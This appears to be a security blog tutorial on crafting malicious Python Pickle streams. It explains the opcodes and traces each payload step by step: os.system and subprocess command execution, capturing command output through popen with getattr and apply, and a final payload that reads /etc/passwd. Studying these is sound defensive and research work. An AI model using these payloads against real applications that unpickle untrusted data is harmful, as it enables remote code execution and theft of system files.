Playing with Python Pickle #2

[This is the second in a series of posts on Pickle. Link to part one.]

In the previous post I introduced Python’s Pickle mechanism for serializing and deserializing data, gave a bit of background on where we came across serialized data, explained how the virtual machine works, and noted that Python intentionally does not perform security checks when unpickling.

In this post, we’ll work through a number of examples that depict exactly why unpickling untrusted data is a dangerous operation. Since we’re going to handcraft Pickle streams, it helps to have an opcode reference handy; here are the opcodes we’ll use:

  • c<module>\n<function>\n -> push <module>.<function> onto the stack. It’s actually more subtle than this but this simplification works for us.
  • ( -> push a MARK object onto the stack.
  • S'<string>'\n -> push <string> object onto the stack.
  • V<string>\n -> push Unicode <string> object onto the stack (unlike ‘S’, the argument is not quoted).
  • l -> pop everything off the stack up to the topmost MARK object, create a list with the objects (excl MARK) and push the list back onto the stack
  • t -> pop everything off the stack up to the topmost MARK object, create a tuple with the objects (excl MARK) and push the tuple back onto the stack
  • R -> pop two objects off the stack; the top object is treated as the argument tuple and the lower object as a callable (function object). Apply the callable to the arguments and push the result back onto the stack
  • p<index>\n -> Peek at the top stack object and store it in memo or register <index>.
  • g<index>\n -> Grab an object from memo or register <index> and push onto the stack.
  • 0 -> Pop and discard the topmost stack item.
  • . -> Terminate the virtual machine. If you’re pasting the examples below into larger Pickle streams, make sure to remove the ‘.’
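
To get a feel for these opcodes before doing anything nasty with them, here is a minimal sketch that feeds a few harmless handcrafted streams to pickle.loads. It assumes Python 3, where streams are bytes and ‘S’ strings are decoded to str by default. The stream contents are made up for illustration, and none of them use ‘c’ or ‘R’, so nothing gets called.

```python
import pickle

# MARK, two strings, then 'l' builds a list from everything above the MARK.
list_stream = b"(S'uname'\nS'-a'\nl."

# Same items, but 't' builds a tuple instead.
tuple_stream = b"(S'uname'\nS'-a'\nt."

# Push a string, store it in memo slot 0, discard it, then fetch it back.
memo_stream = b"S'hello'\np0\n0g0\n."

print(pickle.loads(list_stream))   # ['uname', '-a']
print(pickle.loads(tuple_stream))  # ('uname', '-a')
print(pickle.loads(memo_stream))   # hello
```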

Executing OS commands

In the previous post, the canonical abuse case for unpickling untrusted data was listed:
cos
system
(S'echo hello world'
tR.

Let’s step through this (the stack is included after each step, [SB] indicates the stack bottom):

  1. ‘c’ -> find the callable “os.system”, push the callable onto the stack.
    [SB] [os.system]
  2. ‘(‘ -> push a MARK onto the stack
    [SB] [os.system] [MARK]
  3. ‘S'echo hello world'’ -> push ‘echo hello world’ onto the stack
    [SB] [os.system] [MARK] ['echo hello world']
  4. ‘t’ -> pop “echo hello world” and MARK, push the one-element tuple “(‘echo hello world’,)” onto the stack
    [SB] [os.system] [('echo hello world',)]
  5. ‘R’ -> pop “(‘echo hello world’,)” and “os.system”, call os.system(‘echo hello world’), push the result back on the stack
    [SB] [0]
  6. ‘.’ -> pop the result off the stack and terminate
    [SB], result was '0'
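
The walk-through above can be reproduced with a toy interpreter. What follows is only a rough sketch of the opcode subset from the reference list, not the real Pickle VM: the names run, pop_to_mark and fake_system are invented for this example, string escapes are ignored, and ‘c’ is resolved from a table supplied by the caller so that no real command runs.

```python
MARK = object()  # sentinel standing in for Pickle's MARK object


def pop_to_mark(stack):
    """Pop items down to (and including) the topmost MARK, in push order."""
    items = []
    while True:
        item = stack.pop()
        if item is MARK:
            break
        items.append(item)
    items.reverse()
    return items


def run(stream, globals_table):
    """Interpret a tiny opcode subset; return (result, per-step stack trace)."""
    stack, memo, trace = [], {}, []
    pos = 0

    def readline():
        nonlocal pos
        end = stream.index("\n", pos)
        line = stream[pos:end]
        pos = end + 1
        return line

    while True:
        op = stream[pos]
        pos += 1
        if op == "c":
            module, name = readline(), readline()
            stack.append(globals_table[(module, name)])
        elif op == "(":
            stack.append(MARK)
        elif op == "S":
            stack.append(readline()[1:-1])  # naive: strip quotes, no escapes
        elif op == "l":
            stack.append(pop_to_mark(stack))
        elif op == "t":
            stack.append(tuple(pop_to_mark(stack)))
        elif op == "R":
            args = stack.pop()
            func = stack.pop()
            stack.append(func(*args))
        elif op == "p":
            memo[readline()] = stack[-1]
        elif op == "g":
            stack.append(memo[readline()])
        elif op == "0":
            stack.pop()
        elif op == ".":
            return stack.pop(), trace
        else:
            raise ValueError("unsupported opcode %r" % op)
        trace.append((op, list(stack)))


calls = []


def fake_system(command):
    """Harmless stand-in for os.system: record the command, report success."""
    calls.append(command)
    return 0


result, trace = run("cos\nsystem\n(S'echo hello world'\ntR.",
                    {("os", "system"): fake_system})
for op, stack in trace:
    print(op, stack)
print("result:", result)
```

Swapping fake_system for the real os.system would make the toy behave like the trace above, which is exactly why unpickling untrusted data is dangerous.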

<rat-hole>

Perhaps one instruction that should be clarified is ‘c’, which loads a class based on the two arguments ‘module’ and ‘class’. Pickle’s docs define the behaviour as follows: “The class object module.class is pushed on the stack.  More accurately, the object returned by self.find_class(module, class) is pushed on the stack”. Our previous simplified definition said that the ‘c’ instruction loaded function references, and this is the case, however the full explanation shows that more types than function references can be loaded.

For our purposes we want to load classes that are callable, which is a requirement for the ‘R’ instruction. A callable is an object that has a “__call__” attribute which, if you’re also not a Python programmer, means having to search for more information. A non-expert definition is something like: if the module has functions (e.g. os.system()) then these are suitable for ‘c’. However, class instance method objects (x=Foo();x.bar()) are not suitable for the ‘c’ opcode since it cannot handle class instances. It is also worth pointing out that the ‘R’ opcode doesn’t care about what type of object it executes, so long as the object responds to “__call__”. The interplay between ‘c’ and ‘R’ is important for the approach shown later, since ‘c’ is quite limited but ‘R’ can handle more types of objects.

What this rat-hole concludes with is that we have not come across a Pickle example showing how to execute method calls on class instance objects.
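
To watch the find_class() hook from the docs in action, here is a small sketch assuming Python 3, where an Unpickler subclass can override it. TracingUnpickler is a name made up for this example, and the stream calls the harmless os.getcwd() with an empty argument tuple rather than anything interesting.

```python
import io
import os
import pickle


class TracingUnpickler(pickle.Unpickler):
    """Hypothetical helper: records every lookup triggered by the 'c' opcode."""

    def __init__(self, file):
        super().__init__(file)
        self.lookups = []

    def find_class(self, module, name):
        self.lookups.append((module, name))
        return super().find_class(module, name)


# 'c' pushes os.getcwd, '(' and 't' build an empty tuple, 'R' calls it.
stream = b"cos\ngetcwd\n(tR."
unpickler = TracingUnpickler(io.BytesIO(stream))
result = unpickler.load()

print(unpickler.lookups)
print(result == os.getcwd())
print(callable(os.getcwd))
```

The same override is also the natural place to refuse lookups, by raising an error for any (module, name) pair that isn't expected.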

</rat-hole>

Let’s try to improve on the command execution example. It’s cute for executing commands, but if the unpickling happens on an app server then we won’t see the command’s output, since “os.system()” returns the exit status of the shell rather than stdout/stderr; any output of the command is printed to the server’s stdout. Thus for our ‘echo hello world’ example, the unpickling returns ‘0’ even though the command ran successfully.

Our first goal is to retrieve the output of commands in the reconstructed object. Initial ideas focused on manipulating the shell’s return value to carry over output:

cos
system
(S'printf -v a \'%d\' "\'`uname -a | sed \'s/.\\{2\\}\\(.\\).*/\\1/\'`";exit $a;'
tR.

This combines the shell’s backticks with printf, sed and exit to return one character of the output at a time in the exit status. However, this too is messy: if the output changes between invocations the approach is pretty worthless, and it is also noisy and low bandwidth.
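
The one-character-per-exit-status idea can be sketched without any shell at all. The following assumes Python 3 and uses a Python child process as a stand-in for the printf/sed/exit one-liner. The helper name and the sample text are invented for illustration, and it only works for characters whose code fits in an exit status.

```python
import subprocess
import sys


def leak_char_via_exit_status(text, index):
    """Run a child whose exit status is the character code of text[index]."""
    child_code = "import sys; sys.exit(ord(sys.argv[1][int(sys.argv[2])]))"
    status = subprocess.call(
        [sys.executable, "-c", child_code, text, str(index)]
    )
    return chr(status)


secret = "Darwin"
recovered = "".join(
    leak_char_via_exit_status(secret, i) for i in range(len(secret))
)
print(recovered)
```

One process per character makes the low-bandwidth complaint pretty tangible.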

The next option was “os.popen”, however we quickly became bogged down. “os.popen()” returns an instance (e.g. proc=os.popen(“echo foo”)) and in order to access the output of the command, we’d need to call “proc.read()”. However, as we’ve already mentioned, the pickle instruction set doesn’t appear to support calling instance methods directly. The next option was to look for other modules, and the ‘subprocess’ module did the trick with its ‘check_output()’ function, which takes an executable and a set of arguments, runs the executable on the arguments and returns the output as a string:

csubprocess
check_output
(S'uname'
tR.

returns

'Darwin\n'

This looks like good news in that we’re executing commands and viewing output, however the downsides quickly become apparent. “subprocess.check_output” does not invoke a shell, so we can’t simply pass in “uname -a” as a single string; it needs to be broken up into arguments. More importantly though, “check_output” was only added in Python 2.7, so with earlier versions this won’t work. We can easily overcome the first of these hurdles; “check_output” will take arguments specified in a list like so:

subprocess.check_output(["uname", "-a"])
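
Here is a quick sketch of the list-versus-string difference, assuming Python 3 (where check_output returns bytes) and using the Python interpreter itself as the child process so that it doesn’t depend on “uname” being installed:

```python
import subprocess
import sys

# Arguments as a list: the first item is the executable, the rest its argv.
output = subprocess.check_output(
    [sys.executable, "-c", "print('hello world')"]
)
print(output.strip())

# A single string is treated as the name of the executable (no shell is
# there to split it), so on a POSIX system this lookup is expected to fail.
try:
    subprocess.check_output("uname -a")
except OSError as exc:
    print("failed:", exc)
```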

We just need to craft the instructions to create a list and leave it on the stack:

csubprocess
check_output
((S'uname'
S'-a'
ltR.

This is identical to the previous example except for the additional MARK instruction ‘(‘, the ‘-a’ string argument and the ‘l’ instruction to build a list from the previous MARK. This is a rough execution trace of the VM on the instruction sequence:

  1. ‘c’ -> find the callable “subprocess.check_output”, push the callable onto the stack.
    [SB] [subprocess.check_output]
  2. ‘(‘ -> push a MARK onto the stack
    [SB] [subprocess.check_output] [MARK]
  3. ‘(‘ -> push a MARK onto the stack
    [SB] [subprocess.check_output] [MARK] [MARK]
  4. “S’uname'” -> push ‘uname’ onto the stack
    [SB] [subprocess.check_output] [MARK] [MARK] ['uname']
  5. “S’-a'” -> push ‘-a’ onto the stack
    [SB] [subprocess.check_output] [MARK] [MARK] ['uname'] ['-a']
  6. ‘l’ -> pop “uname”, “-a” and MARK, push the list “[‘uname’,’-a’]” onto the stack
    [SB] [subprocess.check_output] [MARK] [['uname','-a']]
  7. ‘t’ -> pop “[‘uname’,‘-a’]” and MARK, push the one-element tuple “([‘uname’,‘-a’],)” onto the stack
    [SB] [subprocess.check_output] [(['uname','-a'],)]
  8. ‘R’ -> pop “([‘uname’,‘-a’],)” and “subprocess.check_output”, call subprocess.check_output([‘uname’,‘-a’]), push the result back on the stack
    [SB] ['Darwin insurrection.local 10.4.0 Darwin Kernel Version 10.4.0: Fri Apr 23 18:28:53 PDT 2010; root:xnu-1504.7.4~1/RELEASE_I386 i386\n']
  9. ‘.’ -> pop the result off the stack and terminate
    [SB], result was 'Darwin insurrection.local 10.4.0 Darwin Kernel Version 10.4.0: Fri Apr 23 18:28:53 PDT 2010; root:xnu-1504.7.4~1/RELEASE_I386 i386\n'
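
The nested MARKs are easy to check in isolation. This sketch (Python 3 assumed) unpickles only the argument-building part of the stream, so nothing is called; it shows that ‘R’ ends up with a tuple whose single element is the list:

```python
import pickle

# The argument-building opcodes from the stream above, terminated with '.'.
args_stream = b"((S'uname'\nS'-a'\nlt."
args = pickle.loads(args_stream)
print(args)  # (['uname', '-a'],)
```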

The result unfortunately carries a trailing newline, which is ugly. We can make use of the virtual machine to clean up the output for us, by calling “string.strip()” on the output:

cstring
strip
(csubprocess
check_output
((S'uname'
S'-a'
ltRtR.

The trace has been omitted since it just includes another function call, but the approach hints at how one might go about dealing with class instances: attempt to call a module function on the class instance.
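
For the curious, the same nesting can be tried safely. Python 3 has no “string.strip” function, so this sketch substitutes the harmless builtins str and len as stand-ins; the shape of the stream (an outer callable whose argument tuple is built from an inner call) is the same.

```python
import pickle

# Equivalent to str(len(['uname', '-a'])): the inner 'R' runs first and its
# result becomes the only element of the outer call's argument tuple.
nested_stream = (
    b"cbuiltins\nstr\n"   # outer callable
    b"(cbuiltins\nlen\n"  # MARK for outer args, then the inner callable
    b"((S'uname'\nS'-a'\nl"  # MARK for inner args, MARK + items -> list
    b"tR"                 # inner args tuple, call len(...)
    b"tR."                # outer args tuple, call str(...), stop
)
print(pickle.loads(nested_stream))  # 2
```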

If the “check_output” method is relied upon, then we’re still stuck with Python 2.7. Ideally we’d like to run “p=os.popen(‘ls -al’);p.read()”, however since the ‘c’ instruction requires modules and classes, and cannot handle class instances, it is not possible to do this directly. It bears repeating though that the ‘R’ instruction can handle references to instance methods, since they are inherently callable. Thus we need to find a way to call an instance method using only functions. Cue a diversion into Python’s introspection support:

  • __builtin__.getattr(foo, “attribute”) returns foo.attribute, e.g. __builtin__.getattr(file, “read”) -> file.read
  • __builtin__.apply(func, [args]) executes func(*args), i.e. the list supplies func’s positional arguments

Using the introspection tricks and without calling methods on class instances explicitly, we can execute “p=os.popen(‘ls -al’); p.read()” with the following Python:

__builtin__.apply(__builtin__.getattr(file,"read"),[os.popen("ls -al")])
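
The same trick can be tried on Python 3 with a couple of substitutions, all of which are assumptions made for this sketch: “apply” and “file” no longer exist there, so a three-line apply stand-in is defined and io.StringIO plays the part of the file object.

```python
import io


def apply(func, args):
    """Stand-in for Python 2's __builtin__.apply: call func(*args)."""
    return func(*args)


handle = io.StringIO("contents of a pretend file")

# Look the method up on the class, then pass the instance as its argument.
read = getattr(io.StringIO, "read")
print(apply(read, [handle]))
```

The point is that handle.read() never appears: the method is fetched from the class by name and the instance is passed in as an ordinary argument.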

Converted into Pickle, this becomes:

cos
popen
(S'ls -al'
tRp0
0c__builtin__
getattr
(c__builtin__
file
S"read"
tRp1
0c__builtin__
apply
(g1
(g0
ltR.

That’s quite a mouthful, here’s the breakdown:

  1. ‘c’ -> find the callable “os.popen”, push it onto the stack
    [SB] [os.popen]
  2. ‘(‘ -> push a MARK onto the stack
    [SB] [os.popen] [MARK]
  3. “S’ls -al'” -> push ‘ls -al’ onto the stack
    [SB] [os.popen] [MARK] ['ls -al']
  4. ‘t’ -> pop ‘ls -al’ and MARK, push (‘ls -al’,)
    [SB] [os.popen] [('ls -al',)]
  5. ‘R’ -> pop “os.popen” and “(‘ls -al’,)”, call os.popen(‘ls -al’), push the opened file object onto the stack
    [SB] [<open file>]
  6. ‘p0’ -> store “<open file>” in register 0
    [SB] [<open file>]
  7. ‘0’ -> pop and discard topmost stack item
    [SB]
  8. ‘c’ -> find the callable ‘__builtin__.getattr’, push it onto the stack
    [SB] [__builtin__.getattr]
  9. ‘(‘ -> push a MARK onto the stack
    [SB] [__builtin__.getattr] [MARK]
  10. ‘c’ -> find the callable ‘__builtin__.file’, push it onto the stack
    [SB] [__builtin__.getattr] [MARK] [__builtin__.file]
  11. ‘S"read"’ -> push ‘read’ onto the stack
    [SB] [__builtin__.getattr] [MARK] [__builtin__.file] ['read']
  12. ‘t’ -> pop ‘read’, “__builtin__.file” and MARK, push (__builtin__.file, ‘read’)
    [SB] [__builtin__.getattr] [(__builtin__.file, 'read')]
  13. ‘R’ -> pop “__builtin__.getattr” and “(__builtin__.file, ‘read’)”, call __builtin__.getattr(__builtin__.file, ‘read’), push the returned object onto the stack
    [SB] [<method object for 'file.read'>]
  14. ‘p1’ -> store “<method object for ‘file.read’>” in register 1
    [SB] [<method object for 'file.read'>]
  15. ‘0’ -> pop and discard topmost stack item
    [SB]
  16. ‘c’ -> find the callable ‘__builtin__.apply’, push it onto the stack
    [SB] [__builtin__.apply]
  17. ‘(‘ -> push a MARK onto the stack
    [SB] [__builtin__.apply] [MARK]
  18. ‘g1’ -> retrieve contents of register 1, push onto stack
    [SB] [__builtin__.apply] [MARK] [<method object for 'file.read'>]
  19. ‘(‘ -> push a MARK onto the stack
    [SB] [__builtin__.apply] [MARK] [<method object for 'file.read'>] [MARK]
  20. ‘g0’ -> retrieve contents of register 0, push onto stack
    [SB] [__builtin__.apply] [MARK] [<method object for 'file.read'>] [MARK] [<open file>]
  21. ‘l’ -> pop “<open file>” and MARK, push the list “[<open file>]”
    [SB] [__builtin__.apply] [MARK] [<method object for 'file.read'>] [[<open file>]]
  22. ‘t’ -> pop “[<open file>]”, “<method object for ‘file.read’>” and MARK, push the tuple “(<method object for ‘file.read’>, [<open file>])”
    [SB] [__builtin__.apply] [(<method object for 'file.read'>,[<open file>])]
  23. ‘R’ -> pop “__builtin__.apply” and “(<method object for ‘file.read’>,[<open file>])”, call __builtin__.apply(<method object for ‘file.read’>,[<open file>]), push the returned object onto the stack
    [SB] ['lrwxr-xr-x@ 1 root wheel 11 Mar 7 2010 /tmp -> private/tmp\n']
  24. ‘.’ -> pop the result off the stack and terminate
    [SB], returned string was "lrwxr-xr-x@ 1 root wheel 11 Mar 7 2010 /tmp -> private/tmp\n"
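
The memo juggling is easier to follow with something that can be run safely. Below is a sketch of the same pattern ported to Python 3, with several loudly stated assumptions: io.StringIO stands in for the file object returned by os.popen, “builtins” replaces “__builtin__”, and because “apply” no longer exists the final ‘R’ calls the method directly with the instance as its only argument.

```python
import pickle

stream = (
    b"cio\nStringIO\n"       # push io.StringIO
    b"(S'hello world'\ntR"   # call io.StringIO('hello world')
    b"p0\n0"                 # keep the instance in memo 0, clear the stack
    b"cbuiltins\ngetattr\n"  # push getattr
    b"(cio\nStringIO\n"      # MARK, push io.StringIO (the class)
    b"S'read'\ntR"           # call getattr(io.StringIO, 'read')
    b"p1\n0"                 # keep the method in memo 1, clear the stack
    b"g1\n(g0\ntR."          # call method(instance), i.e. instance.read()
)

result = pickle.loads(stream)
print(result)  # hello world
```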

This is really useful, since we no longer depend on “check_output” and can now return command output on Python versions older than 2.7 as well.

That’s enough Pickle for today. I’ll leave you with a final modification of the above pickle string that reads and returns the contents of files:

c__builtin__
file
(S"/etc/passwd"
tRp0
0c__builtin__
getattr
(c__builtin__
file
S"read"
tRp1
0c__builtin__
apply
(g1
(g0
ltR.